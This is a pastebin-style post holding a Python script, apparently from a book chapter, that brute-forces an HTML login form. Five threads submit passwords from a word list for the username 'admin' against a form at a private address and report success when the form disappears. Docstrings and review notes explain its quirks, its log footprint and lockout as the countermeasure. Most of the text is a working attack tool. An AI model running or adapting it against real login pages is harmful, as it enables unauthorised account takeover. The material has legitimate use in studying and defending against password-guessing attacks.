
brute force form

a guest
Dec 9th, 2017
  1. #ch5_html_form_brute_force.py
  2. from html.parser import HTMLParser
  3. import urllib.request
  4. import urllib.parse
  5. import http.cookiejar
  6. import queue
  7. import threading
  8. import sys
  9. import os
  10.  
# Module-level settings read by the functions and classes below.

# Page that is fetched to read the login form, and the endpoint the form is
# POSTed to. Both values are as published; 10.0.0.3 is a private-range address.
target_url = "http://10.0.0.3:9001/login/"
post_url = "http://10.0.0.3:9001/login/"

# `name` attributes of the two <input> elements the parser looks for.
username_field = "username"
password_field = "password"

# Extra request headers. Left empty, so only urllib's default headers go out,
# including its "Python-urllib/<version>" User-Agent, which is an easy string
# to match in web-server logs.
headers = {}

# Not read by the visible code: the entry point passes the literal "admin".
username = "admin"

# Number of worker threads started by html_brute_forcer_thread_starter().
threads = 5

# When set, build_passwd_q() skips every word before this one.
resume_word = None
  19.  
def build_passwd_q(passwd_file):
    """Load the words in *passwd_file* into a FIFO queue, one word per line.

    The whole file is read into memory. Each line is decoded as UTF-8 and
    stripped of trailing whitespace before it is queued.

    When the module-level ``resume_word`` is set, every word before its first
    occurrence is skipped and queuing starts at that word. If the word never
    occurs, the returned queue is empty.

    Args:
        passwd_file: Path of the word list, opened in binary mode.

    Returns:
        A ``queue.Queue`` holding the selected words in file order.
    """
    handle = open(passwd_file, "rb")
    raw_lines = handle.readlines()
    handle.close()

    pending = queue.Queue()
    if not raw_lines:
        # Empty file: nothing to queue, and resume_word is never consulted.
        return pending

    # With no resume word, queuing is active from the first line onwards.
    queuing = not resume_word
    for raw in raw_lines:
        word = raw.decode("utf-8").rstrip()
        if not queuing and word == resume_word:
            queuing = True
        if queuing:
            pending.put(word)
    return pending
  45.  
class BruteForcer():
    """Try queued passwords for one username against an HTML login form.

    For each candidate the worker loop:

    1. GETs ``target_url``;
    2. checks that the page has inputs named ``username_field`` and
       ``password_field``;
    3. POSTs only those two fields to ``post_url``;
    4. parses the reply, and reports success when neither field name appears
       in it.

    Review notes:

    * The success test is only "login form absent from the reply". Any reply
      without those inputs is reported as a hit, so a reported password is
      unconfirmed until it has been checked.
    * On the server side each attempt shows up as a GET of the login page
      followed by a POST, repeated for a single username by ``threads``
      workers. ``headers`` is empty in this file, so urllib's default headers
      (including its Python-urllib User-Agent) are sent. Failed-login
      throttling or lockout per account and per source is the control aimed
      at this request pattern.
    """

    def __init__(self, username, passwd_q):
        """Store the username under test and the queue of candidate passwords."""
        self.username = username
        self.passwd_q = passwd_q
        # Set by a worker once a reply no longer contains the login fields.
        self.found = False

    def html_brute_forcer(self):
        """Worker loop: one GET and one POST per candidate password.

        Runs until the queue is empty, a hit is flagged, or the fetched page
        lacks the expected inputs. On a hit the whole process is terminated
        with ``os._exit(0)``.
        """
        # NOTE: the loop condition reads the module-level passwd_q, while the
        # candidate below is taken from self.passwd_q. The entry point passes
        # the same queue for both.
        while not (passwd_q.empty() or self.found):
            # New cookie jar per attempt. Nothing here calls load() or save(),
            # so the "cookies" filename is never written to.
            jar = http.cookiejar.FileCookieJar("cookies")
            cookie_handler = urllib.request.HTTPCookieProcessor(jar)
            session_opener = urllib.request.build_opener(cookie_handler)

            # Make urlopen() go through the cookie-aware opener.
            urllib.request.install_opener(session_opener)

            login_request = urllib.request.Request(target_url, headers=headers)
            login_response = urllib.request.urlopen(login_request)

            # str() on bytes yields its repr; the slice drops the b-prefix and
            # the surrounding quotes. Escapes such as \n stay as literal text.
            login_markup = str(login_response.read())[2:-1]

            # Find the two expected inputs in the login page.
            parsed_html = BruteParser()
            parsed_html.feed(login_markup)
            form_fields = parsed_html.parsed_results

            if not (username_field in form_fields and password_field in form_fields):
                print("[!] HTML Page is Invalid")
                break

            form_fields[username_field] = self.username
            form_fields[password_field] = self.passwd_q.get()

            print(f"[*] Attempting {self.username}/{parsed_html.parsed_results[password_field]}")

            # urlopen() needs the POST body as bytes.
            encoded_body = urllib.parse.urlencode(form_fields).encode()

            submit_request = urllib.request.Request(post_url, headers=headers)
            submit_response = urllib.request.urlopen(submit_request, data=encoded_body)

            # Same repr-and-slice conversion as for the login page.
            reply_markup = str(submit_response.read())[2:-1]

            # Parse the reply for the login fields again.
            reply_form = BruteParser()
            reply_form.feed(reply_markup)

            if reply_form.parsed_results:
                # Login fields still present: treated as a failed attempt.
                continue

            self.found = True
            print("[*] Brute-Force Attempt is Successful!")
            print(f"[*] Username: {self.username}")
            print(f"[*] Password: {parsed_html.parsed_results[password_field]}")
            print("[*] Done")
            # Immediate process exit; the other worker threads are not joined.
            os._exit(0)

    def html_brute_forcer_thread_starter(self):
        """Start ``threads`` worker threads, each running html_brute_forcer()."""
        print(f"[*] Brute-Forcing with {threads} threads")
        for _ in range(threads):
            threading.Thread(target=self.html_brute_forcer).start()
  116.  
class BruteParser(HTMLParser):
    """HTML parser that records whether the expected login inputs are present.

    After ``feed()``, ``parsed_results`` has a ``username_field`` key and/or a
    ``password_field`` key for each matching ``<input name=...>`` that was
    seen. Each key maps to the field name itself as a placeholder value.

    Only these two names are recorded. Every other input on the form, hidden
    fields included, is ignored, so the caller never posts them back.
    """

    def __init__(self):
        super().__init__()
        # Field name -> placeholder value; empty when neither input was seen.
        self.parsed_results = {}

    def handle_starttag(self, tag, attrs):
        """Record an ``<input>`` whose ``name`` matches a configured field."""
        if tag != "input":
            return
        for attr_name, attr_value in attrs:
            if attr_name != "name":
                continue
            if attr_value == username_field:
                self.parsed_results[username_field] = username_field
            if attr_value == password_field:
                self.parsed_results[password_field] = password_field
  132.  
  133.  
# Entry point. Runs at import time, since there is no __main__ guard.
print("[*] Started HTML Form Brute-Forcer Script")
print("[*] Building Password Queue")

# Word list is read from the current working directory. The name passwd_q must
# stay module-level: BruteForcer.html_brute_forcer reads it in its loop test.
passwd_q = build_passwd_q("passwd.txt")

if not passwd_q.qsize():
    # Also reached when resume_word is set but absent from the file.
    print("[!] Empty Password File!")
    sys.exit(0)

print("[*] Password Queue Build Successful")
# The username is the literal "admin", not the module-level `username`.
attempt_brute_force = BruteForcer("admin", passwd_q)
attempt_brute_force.html_brute_forcer_thread_starter()